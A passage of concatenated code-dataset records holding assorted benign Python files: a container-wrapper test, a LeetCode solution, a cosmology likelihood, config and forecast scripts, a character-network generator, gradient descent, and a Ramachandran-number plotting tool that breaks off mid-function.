image_path=self.image_path,\n bind_dir_list=[self.temp_dir],\n command_string='ls -l /home/vmuser',\n dry_run=True)\n self.assertEqual('singularity exec --bind {1} {0} ls -l /home/vmuser'.\\\n format(self.image_path,[self.temp_dir]),\n 
singularity_cmd)\n\nif __name__=='__main__':\n unittest.main()","sub_path":"test/utils/singularity_run_wrapper_test.py","file_name":"singularity_run_wrapper_test.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"191117528","text":"#\n# @lc app=leetcode.cn id=485 lang=python3\n#\n# [485] 最大连续1的个数\n#\n# https://leetcode-cn.com/problems/max-consecutive-ones/description/\n#\n# algorithms\n# Easy (54.99%)\n# Likes: 72\n# Dislikes: 0\n# Total Accepted: 24.5K\n# Total Submissions: 44.4K\n# Testcase Example: '[1,0,1,1,0,1]'\n#\n# 给定一个二进制数组, 计算其中最大连续1的个数。\n# \n# 示例 1:\n# \n# \n# 输入: [1,1,0,1,1,1]\n# 输出: 3\n# 解释: 开头的两位和最后的三位都是连续1,所以最大连续1的个数是 3.\n# \n# \n# 注意:\n# \n# \n# 输入的数组只包含 0 和1。\n# 输入数组的长度是正整数,且不超过 10,000。\n# \n# \n#\n\n# @lc code=start\nfrom typing import List\n\n\nclass Solution:\n def findMaxConsecutiveOnes(self, nums: List[int]) -> int:\n # return max(map(len, \"\".join(map(str, nums)).split(\"0\")))\n\n c = max_c = 0\n for n in nums:\n if n == 1:\n c += 1\n else:\n max_c = max(max_c, c)\n c = 0\n return max(max_c, c)\n\n# @lc code=end\n","sub_path":"easy/485.最大连续-1-的个数.py","file_name":"485.最大连续-1-的个数.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"235065105","text":"import os\nimport numpy as np\nfrom montepython.likelihood_class import Likelihood\nimport montepython.io_mp as io_mp\nimport warnings\n\n\nclass growth(Likelihood):\n\n # initialization routine\n\n def __init__(self, path, data, command_line):\n\n Likelihood.__init__(self, path, data, command_line)\n\n # define array for values of z and data points\n self.z = np.array([], 'float64')\n self.data = np.array([], 'float64')\n self.error = np.array([], 'float64')\n\n # read redshifts and data points\n with open(os.path.join(self.data_directory, self.file), 'r') as filein:\n for line in filein:\n if 
line.find('#') == -1:\n # the first entry of the line is the identifier\n this_line = line.split()\n self.z = np.append(self.z, float(this_line[1]))\n self.data = np.append(self.data, float(this_line[2]))\n self.error = np.append(self.error, float(this_line[3]))\n\n # number of data points\n self.num_points = np.shape(self.z)[0]\n\n # end of initialization\n\n # compute likelihood\n\n def loglkl(self, cosmo, data):\n\n chi2 = 0.\n\n # for each point, compute growth rate f, power spectrum normalization sig8,\n # theoretical prediction and chi2 contribution\n\n for i in range(self.num_points):\n\n s8 = cosmo.sigma8_at_z(self.z[i])\n f = cosmo.growthrate_at_z(self.z[i])\n theo = f*s8\n\n chi2 += ((theo - self.data[i]) / self.error[i]) ** 2\n\n # return ln(L)\n lkl = - 0.5 * chi2\n return lkl\n","sub_path":"montepython/likelihoods/growth/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"274853021","text":"import glob\nimport os\nimport sys\nimport fileinput\nfrom configparser import RawConfigParser\ndef main():\n\tpath = os.path.realpath('Config_files')\n\tpath = path +\"/*.ini\"\n\tconfig = RawConfigParser()\n\tconfig.optionxform=str\n\tconfig.read(os.path.abspath('replace.ini'))\n\tlist_files = glob.glob(path)\n\tfor file_name in list_files:\n\t\tfor section in config.sections():\n\t\t\tfor key in config.options(section):\n\t\t\t\tvalue = config.get(section, key)\n\t\t\t\tfun(file_name, key, value)\n\t\t\t\ndef fun(file_name, key, value): \n\tfile1 = fileinput.FileInput(file_name, inplace=1)\n\tfor line in file1:\n\t\tif key in line: \n\t\t\tline = line.replace(key, value)\n\t\tsys.stdout.write(line)\n\tfile1.close()\n\nmain()\n","sub_path":"Controller_Automation/list_file.py","file_name":"list_file.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} 
+{"seq_id":"264754069","text":"from dvik_loop import Loop2Series\nimport datetime\nimport os\nimport re\nimport json\n\nDEBUG = True\n\n\ndef process(html_dir: str, forecast_dir: str, loop2_dir: str, days: int):\n if DEBUG:\n print('-------------------------------')\n print(' processing forecast monitoring')\n print(f\" html_dir: {html_dir}\")\n print(f\" forecast_dir: {forecast_dir}\")\n print(f\" loop2_dir: {loop2_dir}\")\n print(f\" days: {days}\")\n print('-------------------------------')\n\n end_dt = datetime.datetime.utcnow()\n start_dt = end_dt - datetime.timedelta(days=days)\n\n l2s = None\n for m in range(15):\n try:\n print(\"[INFO] Próbuję pobrać dane LOOP2 dla end_dt = {}\".format(end_dt - datetime.timedelta(minutes=m)))\n l2s = Loop2Series(loop2_dir, start_dt, end_dt - datetime.timedelta(minutes=m), interval=0.25)\n break\n except ValueError:\n print(\"[WARNING] Nie udało się pobrać danych LOOP2 dla end_dt = {}.\".format(\n end_dt - datetime.timedelta(minutes=m)))\n if l2s is None:\n msg = \"Nie udało się pobrać danych LOOP2.\"\n print(\"[ERROR] {}\".format(msg))\n raise ValueError(msg)\n\n json_path = os.path.join(html_dir, 'forecast.json')\n\n params = get_params(forecast_dir)\n res_dict = get_res_dict(params, l2s, start_dt)\n print(list(res_dict.keys()))\n json.dump(res_dict, open(json_path, 'w'))\n print(f\"[INFO] zapisano {json_path}\")\n\n\ndef get_params(forecast_dir: str):\n params = []\n for f in os.listdir(forecast_dir):\n f_name = f[:-5]\n f_path = os.path.join(forecast_dir, f)\n fn_parts = f_name.split('_')\n dt, param, horizon, hours = fn_parts\n dt = datetime.datetime.strptime(dt, \"%y%m%d%H%M\")\n param = {\n 'temp': 'avg_temp',\n 'ptemp': 'pca_avg_temp',\n 'wiatr': 'avg_wind',\n }[param]\n horizon = int(horizon)\n hours = int(hours)\n params.append({\n 'dt': dt,\n 'param': param,\n 'horizon': horizon,\n 'hours': hours,\n 'file': f_path,\n })\n return params\n\n\ndef _get_nearest_dt(dt: datetime.datetime) -> datetime.datetime:\n if 
dt.minute % 15 > 7:\n dt += datetime.timedelta(minutes=15 - dt.minute % 15)\n else:\n dt -= datetime.timedelta(minutes=dt.minute % 15)\n return dt\n\n\ndef _get_predictions(fpath: str):\n pr_dict = json.load(open(fpath, 'r'))\n return pr_dict['simple'], pr_dict['mean'], pr_dict.get('complex')\n\n\ndef get_res_dict(params: list, l2s: Loop2Series, start_dt: datetime.datetime) -> dict:\n l2data = l2s.get_data()\n res_dict = {}\n for pd in params:\n dt = pd['dt']\n if dt < start_dt:\n continue\n dt_str = dt.strftime(\"%Y-%m-%d %H:%M\")\n nr_dt = _get_nearest_dt(dt)\n param = pd['param']\n horizon = pd['horizon']\n hours = pd['hours']\n fpath = pd['file']\n\n try:\n simple_pr, mean_pr, complex_pr = _get_predictions(fpath)\n except json.decoder.JSONDecodeError:\n continue\n try:\n if param.startswith('pca_'):\n l2_val = l2data[nr_dt][param[4:]]\n else:\n l2_val = l2data[nr_dt][param]\n except KeyError:\n l2_val = None\n if not param in res_dict:\n res_dict[param] = {}\n if not horizon in res_dict[param]:\n res_dict[param][horizon] = {}\n if not hours in res_dict[param][horizon]:\n res_dict[param][horizon][hours] = {}\n res_dict[param][horizon][hours][dt_str] = {\n 'loop2': l2_val,\n 'simple': simple_pr,\n 'mean': mean_pr,\n 'complex': complex_pr,\n }\n return res_dict\n","sub_path":"dvik_monitoring/bin/forecast_monitoring.py","file_name":"forecast_monitoring.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"316843753","text":"import random\n\nimport cast\nfrom relationships import relType as rType\nfrom cast import ConnectionStrategy\nfrom characters import character\n\n# Create graph\nc = cast.cast()\n# Add characters\ntotalCharacters = random.randint(4, 15)\n#totalCharacters = 4\nprint(\"TOTAL CHARACTERS: \" + str(totalCharacters))\nfor n in range(totalCharacters):\n c.addCharacter(character())\n\n# GENERATE FAMILIAL RELATIONSHIP NETWORK\nnumFamilies = 
(int(totalCharacters/6), int(totalCharacters/3))\nnumFamilyMembers = (max(2, int(totalCharacters/6)), int(totalCharacters/3))\nif (numFamilies[1] * numFamilyMembers[1] > totalCharacters):\n print(\"WARNING: May have too few characters for max possible families and members\")\nprint(\"Family parameters: number\" + str(numFamilies) + \", size\" + str(numFamilyMembers))\n\n# GENERATE ROMANTIC RELATIONSHIP NETWORK\nnumRomances = int(0.5 * totalCharacters)\n\n# GENERATE PROFESSIONAL RELATIONSHIP NETWORK\nnumEmployers = (int(totalCharacters/6), int(totalCharacters/3))\nnumEmployees = (max(2, int(totalCharacters/6)), int(totalCharacters/3))\nif (numEmployers[1] * numEmployees[1] > totalCharacters):\n print(\"WARNING: May have too few characters for max possible professional relationships\")\nprint(\"Professional parameters: number\" + str(numEmployers) + \", size\" + str(numEmployees))\n\n# GENERATE SOCIAL RELATIONSHIP NETWORK\nnumSocialGroups = (int(totalCharacters/6), int(totalCharacters/3))\nnumSocialites = (max(2, int(totalCharacters/6)), int(totalCharacters/3))\nif (numSocialGroups[1] * numSocialites[1] > totalCharacters):\n print(\"WARNING: May have too few characters for max possible social relationships\")\nprint(\"Social parameters: number\" + str(numSocialGroups) + \", size\" + str(numSocialites))\n\nc.generateRelationshipGroupings(rType.familial, 1, numFamilies, numFamilyMembers, ConnectionStrategy.totallyConnect)\nc.generateRelationshipGroupings(rType.romantic, -1, (numRomances, numRomances), (2,2), ConnectionStrategy.totallyConnect)\nc.generateRelationshipGroupings(rType.professional, 3, numEmployers, numEmployees, ConnectionStrategy.randomlyConnect)\nc.generateRelationshipGroupings(rType.social, 3, numSocialGroups, numSocialites, ConnectionStrategy.randomlyConnect)\n# Generate non-plot families (wip)\n#c.generateRelationshipGroupings(rType.familial, 1, (totalCharacters,totalCharacters), (1,1), 
ConnectionStrategy.totallyConnect)\n\nc.createRelationshipEntities()\n\n# Fill in remaining details\nc.generateNonPlotFamilies()\n\n# Print names\nprint(\"- Relationships -\")\nfor char in c.characters:\n print(char.getFullName() + \" [\" + str(char.id) + \"]\")\n for relation in char.typesByRelation.keys():\n print(\" - \" + relation.getFullName() + \" [\" + str(relation.id) + \"] \" + \"(\" + str([x.type.name for x in char.typesByRelation[relation]]) + \")\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"344259344","text":"#!/usr/bin/python3\nimport numpy as np\nfrom scipy import linalg\nimport matplotlib.pyplot as plt\n\n# the cost function J\ndef costFunction(theta,X,y,m):\n Z = X.dot(theta) - y\n return (0.5/m)*(np.dot(Z.T,Z))\n\n# gradient descent algorithm\ndef gradientDescent(theta , X , y , m , alpha = 0.037 , eps = 1e-8, maxIter=100000):\n # converting al the matrix to float type\n theta = np.array(theta).astype(float)\n X = np.array(X).astype(float)\n y = np.array(y).astype(float)\n # printing the shape of theta (rows)X(columns)\n print(\"theta \" , np.shape(theta))\n # iteration number : iter\n iter =0\n # prev : MSE for previous iterarion\n prev = costFunction(theta, X, y, m)\n # loop till you reach convergence\n while iter)\nfilename.rcode.his.eps (y-axis: Ramachandran number (R); color: frequency of R in model)\nfilename.rcode.rmsf.eps (y-axis: residue #; color: RMSF in R from the previous model)\n---------------\nAdditional tags\n---------------\n-h - Prints this message\n-ss - Color the ramachandran number codes (R-codes) by \n secondary structure (default: color by chirality and sign)\n-signed - Use the signed version of the ramachandran number\n-target - Target directory to save output\n-rmsd - Also producee \"filename.rcode.rmsd.eps\"\n (y-axis: residue #; color: RMSD in R from first 
model)\n---------------\nEach graph is also accompanied by \"_colorbar.eps\", which are keys.\n---------------\nThe Ramachandran number concept is discussed in the following manuscripts (this tool is discussed in the first reference):\n1. Mannige (2018) \"A simpler Ramachandran number can simplify the life of a protein simulator\" Manuscript Prepared/Submitted\n2. Mannige, Kundu, Whitelam (2016) \"The Ramachandran number: an order parameter for protein geometry\" PLoS ONE 11(8): e0160023. \nFull Text: https://doi.org/10.1371/journal.pone.0160023\n============================================\n\"\"\"\n\n# Standard imports\nimport sys,re,os,math\n\n# Commonly available imports\nimport copy,string,glob\nimport numpy as np\n\n# matplotlib imports\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LinearSegmentedColormap\n# Biopython (can do without)\ntry:\n\tbiopython = True\n\tfrom Bio import PDB\nexcept:\n\tbiopython = False\n#\n\ndef normalized_ramachandran_number(phi,psi,signed=False):\n\tr = (phi+psi+360)/720.0\n\t#\n\tif signed:\n\t\tif psi < phi:\n\t\t\tr = r * -1.0\n\t\t#\n\t#\n\treturn r\n#\n\ndef ramachandran_number(phi,psi,signed=False):\n\treturn normalized_ramachandran_number(phi,psi,signed)\n#\n\ndef r(phi,psi,signed=False):\n\treturn normalized_ramachandran_number(phi,psi,signed)\n#\n\ndef R(phi,psi,signed=False):\n\treturn normalized_ramachandran_number(phi,psi,signed)\n#\n\n#sys.path.insert(0, \"./local_imports/\") # for the local imports\n#import Geometry, PeptideBuilder, locallib\n\nsigned = 0\nrrange = [0,1]\ncolortype = \"Chirality\" # can be SecondaryStructure\n\nshoweps = 0\ndofilter = 0\n\nshowrcode = 1\nshowhis = 1\nshowrmsf = 1\nshowrmsd = 0\ndo_vmd_etc = 1\n\nbins = 100\npdbfn = \"\"\n\n# python plotmap.py -pdb /home/ranjan/Desktop/old/pairing_functions/for_sharing/structures/nanosheet_birth_U7.pdb\n# python plotmap.py -pdb /home/ranjan/Desktop/old/pairing_functions/for_sharing/structures/nanosheet_traj.pdb\n# python plotmap.py 
-pdb /home/ranjan/Desktop/old/pairing_functions/for_sharing/structures/class_a_alpha_1MBA.pdb\n# python plotmap.py -pdb /home/ranjan/Desktop/old/pairing_functions/for_sharing/structures/class_c_a_plus_b_2ACY.pdb\n\n\nforcedmax = False\nforcedmin = False\n\nshow_graphs = 1\ndefault_fontsize = 22\ncolorbarXscaling = 0.08\ndefaultXscaling = 2.0\n\nSCALE = 10.0 # For the postscript output\n\n\n# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n# SETTING UP SOME COLORMAPS\n\nCOLORSWITCH = 0.5 # THIS IS THE POINT, FOR THE RED/BLUE AND RED/BLUE/YELLOW/BLACK \n # COLOR SCHEME, WHERE THE SWITCH IN COLOR HAPPENS (NAIVELY 0.5, \n # BUT BETA SHEETS SPILL TO THE \"D\" PORTION OF THE PLOT, SO IT \n # IS 0.45\n\n# First, some definitions:\n# DEFINING COLORS BY CHIRALITY:\n# c stands for color, bc stands for background color \n # when R ranges from [-1,1] (\"Signed R\") [0,1] (Traditional R)\n # ------------ -----------\nc1 = [0,0,0] # black | \\_ c4 / | |\\_ c4 |\nc2 = [1,1,0] # yellow | \\_ / | | \\_ |\nc3 = [1,0,0] # red psi |c3 /\\_c2 | psi | \\_ |\nc4 = [0,0,1] # blue | / \\_ | | \\_ |\nbc = [1,1,1] # white |/ c1 \\| |c3 \\|\n # ------------ -----------\n # phi phi\n# DEFINING POSITIONS AND COLORS BY SECONDARY STRUCTURE:\n# POSITIONS\nhelix_start = 0.31 # the start of the helical region (all assuming R in [0,1])\nhelix_end = 0.39 # the end of the helical region\nsheet_start = 0.45 # the start of the sheet region\nsheet_end = 0.62 # the end of the sheet region\npolyproline_end = 0.66 # the end of the polyprolineII region \n # (the start coincides with the sheet region, \n # so it just begins after the sheet region ends)\n# COLORS\nhelixR = (1.,0.,0.)\nsheet = (0.,0.,1.)\npolyproline = (0.,1.,1.)\n\n# ----------------\n# NEW COLOR SCHEME: color by backbone twist (expected range: R=[0,1])\n# ----------------\n# This lets you later on get the cmap by name 
'TwoColor': cmap = plt.get_cmap('TwoColor')\n# POSITION: 0 COLORSWITCH 1\n# COLOR: | white - red | blue - white |\ncdict = {\n# white white red blue white white\n\t'red': ((0.00, bc[0], bc[0]), (COLORSWITCH, c3[0], c4[0]), (1.0, bc[0], bc[0])), \n\t'green': ((0.00, bc[1], bc[1]), (COLORSWITCH, c3[1], c4[1]), (1.0, bc[1], bc[1])),\n\t'blue': ((0.00, bc[2], bc[2]), (COLORSWITCH, c3[2], c4[2]), (1.0, bc[2], bc[2])) \n}\ncmap = LinearSegmentedColormap('Chirality', cdict)\nplt.register_cmap(cmap=cmap)\n# ----------------\n# NEW COLOR SCHEME: color by backbone twist, variant (expected range: R=[0,1])\n# ----------------\ncdict = {\n# white white blue blue\n\t'red': ((0.00, bc[0], bc[0]), (1.0, c4[0], c4[0])), \n\t'green': ((0.00, bc[1], bc[1]), (1.0, c4[1], c4[1])),\n\t'blue': ((0.00, bc[2], bc[2]), (1.0, c4[2], c4[2]))\n}\ncmap = LinearSegmentedColormap('deleteme', cdict)\nplt.register_cmap(cmap=cmap)\ncdict = {\n# white white blue blue\n\t'red': ((0.00, 1, 1), (0.5, bc[0], bc[0]), (1.0, c4[0], c4[0])), \n\t'green': ((0.00, 0, 0\t), (0.5, bc[1], bc[1]), (1.0, c4[1], c4[1])),\n\t'blue': ((0.00, 1, 1), (0.5, bc[2], bc[2]), (1.0, c4[2], c4[2])) \n}\ncmap = LinearSegmentedColormap('deletemeSigned', cdict)\nplt.register_cmap(cmap=cmap)\n# ----------------\n# NEW COLOR SCHEME: color by backbone twist, variant (expected range: R=[0,1])\n# ----------------\n# This lets you later on get the cmap by name 'TwoColorInverted': cmap = plt.get_cmap('TwoColorInverted')\n# POSITION: 0 0.25 0.5 0.75 1\n# COLOR: | white - black | yellow - white | white - red | blue - white |\ncdict = {\n# red red white white blue blue\n\t'red': ((0.00, c3[0], c3[0]), (COLORSWITCH, bc[0], bc[0]), (1.0, c4[0], c4[0])), \n\t'green': ((0.00, c3[1], c3[1]), (COLORSWITCH, bc[1], bc[1]), (1.0, c4[1], c4[1])),\n\t'blue': ((0.00, c3[2], c3[2]), (COLORSWITCH, bc[2], bc[2]), (1.0, c4[2], c4[2])) \n}\ncmap = LinearSegmentedColormap('Chirality_r', cdict)\nplt.register_cmap(cmap=cmap)\n# ----------------\n# NEW COLOR 
SCHEME: color by backbone twist (expected range: R=[-1,1])\n# ----------------\n# This lets you later on get the cmap by name 'FourColor': cmap = plt.get_cmap('FourColor')\n# POSITION: 0 0.25 0.5 0.75 1\n# COLOR: | white - black | yellow - white | white - red | blue - white |\ncdict = {\n# white white black yellow white white white white blue blue\n\t'red': ((0.00, bc[0], bc[0]), (0.25, c1[0], c2[0]), (0.50, bc[0], bc[0]), (0.75, c3[0], c4[0]), (1.0, bc[0], bc[0])), \n\t'green': ((0.00, bc[1], bc[1]), (0.25, c1[1], c2[1]), (0.50, bc[1], bc[1]), (0.75, c3[1], c4[1]), (1.0, bc[1], bc[1])),\n\t'blue': ((0.00, bc[2], bc[2]), (0.25, c1[2], c2[2]), (0.50, bc[2], bc[2]), (0.75, c3[2], c4[2]), (1.0, bc[2], bc[2])) \n}\ncmap = LinearSegmentedColormap('ChiralityFourColor', cdict)\nplt.register_cmap(cmap=cmap)\n# ----------------\n# NEW COLOR SCHEME: color by backbone twist, variant (expected range: R=[-1,1])\n# ----------------\n# This lets you later on get the cmap by name 'FourColorInverted': cmap = plt.get_cmap('FourColorInverted')\n# POSITION: 0 0.25 0.5 0.75 1\n# COLOR: | black - white | white - yellow | red - white | white - blue |\ncdict = {\n# black black white white yellow red white white blue blue\n\t'red': ((0.00, c1[0], c1[0]), (0.25, bc[0], bc[0]), (0.50, c2[0], c3[0]), (0.75, bc[0], bc[0]), (1.0, c4[0], c4[0])), \n\t'green': ((0.00, c1[1], c1[1]), (0.25, bc[1], bc[1]), (0.50, c2[1], c3[1]), (0.75, bc[1], bc[1]), (1.0, c4[1], c4[1])),\n\t'blue': ((0.00, c1[2], c1[2]), (0.25, bc[2], bc[2]), (0.50, c2[2], c3[2]), (0.75, bc[2], bc[2]), (1.0, c4[2], c4[2])) \n}\ncmap = LinearSegmentedColormap('Chirality_rFourColor', cdict)\nplt.register_cmap(cmap=cmap)\n# -------------------------\n# NEW COLOR SCHEME: secondary structure (expected range: R=[0,1])\n# ----------------\n# This lets you later on get the cmap by name 'SecondaryStructure': cmap = plt.get_cmap('SecondaryStructure')\n#\n# white white white red red white white blue blue cyan cyan white white\ncdict = { # | | 
| | | | | | | | | | |\n 'red': ((0.00, bc[0], bc[0]), (helix_start, bc[0], helixR[0]), (helix_end, helixR[0], bc[0]), (sheet_start, bc[0], sheet[0]), (sheet_end, sheet[0], polyproline[0]), (polyproline_end, polyproline[0], bc[0]), (1, bc[0],bc[0])), \n 'green': ((0.00, bc[1], bc[1]), (helix_start, bc[1], helixR[1]), (helix_end, helixR[1], bc[1]), (sheet_start, bc[1], sheet[1]), (sheet_end, sheet[1], polyproline[1]), (polyproline_end, polyproline[1], bc[1]), (1, bc[1],bc[1])),\n 'blue': ((0.00, bc[2], bc[2]), (helix_start, bc[2], helixR[2]), (helix_end, helixR[2], bc[2]), (sheet_start, bc[2], sheet[2]), (sheet_end, sheet[2], polyproline[2]), (polyproline_end, polyproline[2], bc[2]), (1, bc[2],bc[2]))\n }\ncmap = LinearSegmentedColormap('SecondaryStructureHard', cdict)\nplt.register_cmap(cmap=cmap)\n# -------------------------\n# NEW COLOR SCHEME: secondary structure (expected range: R=[0,1])\ndef border_mod(v):\n\t# Old min/max\n\t# 0 1\n\t# | v |\n\t# to:\n\t# New min/max\n\t# 0.9 1\n\t# |v |\n\told_min = 0.0; old_max=1.0\n\tnew_min = 0.9; new_max=1.0\n\treturn new_min + (new_max-new_min)*(v-old_min)/(old_max-old_min)\n#\n# white white white red (ish) red red red(ish) white white blue(ish) blue blue blue(ish) cyan cyan(ish) white white white\ncdict = { # | | | | | | | | | | | | | | | | | | \n 'red': ((0.00, bc[0], bc[0]), (helix_start, bc[0], border_mod(helixR[0])), ((helix_start+helix_end)/2.0, helixR[0], helixR[0]), (helix_end, border_mod(helixR[0]), bc[0]), (sheet_start, bc[0], border_mod(sheet[0])), ((sheet_start+sheet_end)/2.0, sheet[0], sheet[0]), (sheet_end, border_mod(sheet[0]), polyproline[0]), (polyproline_end, border_mod(polyproline[0]), bc[0]), (1, bc[0],bc[0])),\n 'green': ((0.00, bc[1], bc[1]), (helix_start, bc[1], border_mod(helixR[1])), ((helix_start+helix_end)/2.0, helixR[1], helixR[1]), (helix_end, border_mod(helixR[1]), bc[1]), (sheet_start, bc[1], border_mod(sheet[1])), ((sheet_start+sheet_end)/2.0, sheet[1], sheet[1]), (sheet_end, 
border_mod(sheet[1]), polyproline[1]), (polyproline_end, border_mod(polyproline[1]), bc[1]), (1, bc[1],bc[1])), \n 'blue': ((0.00, bc[2], bc[2]), (helix_start, bc[2], border_mod(helixR[2])), ((helix_start+helix_end)/2.0, helixR[2], helixR[2]), (helix_end, border_mod(helixR[2]), bc[2]), (sheet_start, bc[2], border_mod(sheet[2])), ((sheet_start+sheet_end)/2.0, sheet[2], sheet[2]), (sheet_end, border_mod(sheet[2]), polyproline[2]), (polyproline_end, border_mod(polyproline[2]), bc[2]), (1, bc[2],bc[2]))\n }\ncmap = LinearSegmentedColormap('SecondaryStructure', cdict)\nplt.register_cmap(cmap=cmap)\n# ----------------\n# NEW COLOR SCHEME: color by secondary structure (expected range: R=[-1,1])\n# ----------------\n# POSITION (MIRRORRED AROUND 0): 0 helix_start helix_end sheet_start sheet_end polyproline_end 1\n# COLOR: | white - white | helixR - helixR | white - white | sheet - sheet | polyproline - polyproline | white - white |\ncdict = { \n 'red': [[-1, bc[0], bc[0]], [polyproline_end*-1, bc[0],polyproline[0]], [sheet_end*-1, polyproline[0],sheet[0]], [sheet_start*-1, sheet[0], bc[0]], [helix_end*-1, bc[0],helixR[0]], [helix_start*-1, helixR[0],bc[0]], [helix_start, bc[0], helixR[0]], [helix_end, helixR[0], bc[0]], [sheet_start, bc[0], sheet[0]], [sheet_end, sheet[0], polyproline[0]], [polyproline_end, polyproline[0], bc[0]], [1, bc[0],bc[0]]],\n 'green': [[-1, bc[1], bc[1]], [polyproline_end*-1, bc[1],polyproline[1]], [sheet_end*-1, polyproline[1],sheet[1]], [sheet_start*-1, sheet[1], bc[1]], [helix_end*-1, bc[1],helixR[1]], [helix_start*-1, helixR[1],bc[1]], [helix_start, bc[1], helixR[1]], [helix_end, helixR[1], bc[1]], [sheet_start, bc[1], sheet[1]], [sheet_end, sheet[1], polyproline[1]], [polyproline_end, polyproline[1], bc[1]], [1, bc[1],bc[1]]], \n 'blue': [[-1, bc[2], bc[2]], [polyproline_end*-1, bc[2],polyproline[2]], [sheet_end*-1, polyproline[2],sheet[2]], [sheet_start*-1, sheet[2], bc[2]], [helix_end*-1, bc[2],helixR[2]], [helix_start*-1, helixR[2],bc[2]], 
[helix_start, bc[2], helixR[2]], [helix_end, helixR[2], bc[2]], [sheet_start, bc[2], sheet[2]], [sheet_end, sheet[2], polyproline[2]], [polyproline_end, polyproline[2], bc[2]], [1, bc[2],bc[2]]] \n } \n# this cdict is not normalized from 0 to 1, which is required for the line following the \"for\" loop.\nminpos = False\nmaxpos = False\nfor color in list(cdict.keys()):\n\tfor i in range(len(cdict[color])):\n\t\tif minpos == False:\n\t\t\tminpos = cdict[color][i][0]\n\t\tif maxpos == False:\n\t\t\tmaxpos = cdict[color][i][0]\n\t\tif minpos > cdict[color][i][0]:\n\t\t\tminpos = cdict[color][i][0]\n\t\tif maxpos < cdict[color][i][0]:\n\t\t\tmaxpos = cdict[color][i][0]\nfor color in list(cdict.keys()):\n\tfor i in range(len(cdict[color])):\n\t\tcdict[color][i][0] = float(cdict[color][i][0]-minpos)/(maxpos-minpos)\ncmap = LinearSegmentedColormap('SecondaryStructureFourColor', cdict)\nplt.register_cmap(cmap=cmap)\n\n\n#rcode_cmap = plt.get_cmap('Chirality')\n#rcode_cmap = plt.get_cmap('Chirality_r')\nrcode_cmap = plt.get_cmap('ChiralityFourColor')\n#rcode_cmap = plt.get_cmap('ChiralityFourColor_r')\n#rcode_cmap = plt.get_cmap('SecondaryStructure')\n#rcode_cmap = plt.get_cmap('SecondaryStructureFourColor')\n\n\n# ===================================================================================\n\n# Simple smoothing function\ndef median_filter(vals,nearest_neighbors=1):\n\tnew_vals = []\n\tlen_vals = len(vals)\n\tfor i in range(len_vals):\n\t\tval = vals[i]\n\t\tif i-nearest_neighbors >= 0 and i+nearest_neighbors < len_vals:\n\t\t\tval = np.median(vals[i-nearest_neighbors:i+nearest_neighbors+1])\n\t\tnew_vals.append(val)\n\treturn new_vals\n#\n\ndef calculate_dihedral_angle(p):\n\tb = p[:-1] - p[1:]\n\tb[0] *= -1\n\tv = np.array( [ v - (v.dot(b[1])/b[1].dot(b[1])) * b[1] for v in [b[0], b[2]] ] )\n\t# Normalize vectors\n\tv /= np.sqrt(np.einsum('...i,...i', v, v)).reshape(-1,1)\n\tb1 = b[1] / np.linalg.norm(b[1])\n\tx = np.dot(v[0], v[1])\n\tm = np.cross(v[0], b1)\n\ty = 
np.dot(m, v[1])\n\td = np.degrees(np.arctan2( y, x ))\n\treturn d\n\naa_three_to_one = {'CYS': 'C', 'ASP': 'D', 'SER': 'S', 'GLN': 'Q', 'LYS': 'K',\n 'ILE': 'I', 'PRO': 'P', 'THR': 'T', 'PHE': 'F', 'ASN': 'N', \n 'GLY': 'G', 'HIS': 'H', 'LEU': 'L', 'ARG': 'R', 'TRP': 'W', \n 'ALA': 'A', 'VAL':'V', 'GLU': 'E', 'TYR': 'Y', 'MET': 'M'}\n#\n\t\ndef read_pdb_biopython(fn,signed=0):\n\tp=PDB.PDBParser() #(PERMISSIVE=1)\n\tstructure=p.get_structure(fn[:-len(\".pdb\")], fn)\n\t#for model in structure:\n\t#\tprint [model.id]\n\tmodel_to_chain_to_resno_atom_to_vals = {}\n\t# structure (models) -> model -> chain -> residue -> atom\n\tfor model in structure:\n\t\tmodel_number = model.id\n\t\t#\n\t\tif not model_number in model_to_chain_to_resno_atom_to_vals:\n\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number] = {}\n\t\t#\n\t\tfor chain in model:\n\t\t\tsegname = chain.id\n\t\t\tif not segname in model_to_chain_to_resno_atom_to_vals[model_number]:\n\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname] = {}\n\t\t\t\n\t\t\tfor residue in chain:\n\t\t\t\tresname = residue.resname\n\t\t\t\tresno = residue.id[1]\n\t\t\t\t\n\t\t\t\t#\n\t\t\t\ti = resno\n\t\t\t\tim = i-1\n\t\t\t\tip = i+1\n\t\t\t\t\n\t\t\t\tneighbors_found = 1\n\t\t\t\ttry:\n\t\t\t\t\ta = structure[model_number][segname][im][\"C\"].coord\n\t\t\t\t\tb = structure[model_number][segname][i][\"N\"].coord\n\t\t\t\t\tc = structure[model_number][segname][i][\"CA\"].coord\n\t\t\t\t\td = structure[model_number][segname][i][\"C\"].coord\n\t\t\t\t\te = structure[model_number][segname][ip][\"N\"].coord\n\t\t\t\t\t\n\t\t\t\t\tif not resno in model_to_chain_to_resno_atom_to_vals[model_number][segname]:\n\t\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname][resno] = {}\n\t\t\t\t\t\n\t\t\t\t\tmodel_to_chain_to_resno_atom_to_vals[model_number][segname][resno][\"resname\"] = 